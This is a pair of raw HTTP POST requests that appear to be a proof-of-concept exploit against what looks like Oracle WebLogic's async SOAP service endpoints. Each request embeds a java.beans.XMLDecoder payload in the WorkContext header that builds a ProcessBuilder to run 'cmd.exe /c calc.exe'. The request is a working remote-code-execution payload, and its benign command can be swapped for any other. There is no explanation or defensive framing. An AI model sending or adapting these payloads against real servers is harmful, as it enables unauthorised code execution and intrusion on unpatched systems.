POST /_async/AsyncResponseService HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Host: localhost:7001
Content-Length: 997

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>cmd.exe</string>
            </void>
            <void index="1">
              <string>/c</string>
            </void>
            <void index="2">
              <string>calc.exe</string>
            </void>
          </array>
          <void method="start"/>
		</void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
      <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>



POST /_async/AsyncResponseServiceSoap12 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Host: localhost:7001
Content-Length: 1001

<soapenv:Envelope xmlns:soapenv="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseServiceSoap12">
  <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>cmd.exe</string>
            </void>
            <void index="1">
              <string>/c</string>
            </void>
            <void index="2">
              <string>calc.exe</string>
            </void>
          </array>
          <void method="start"/>
		</void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
      <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>
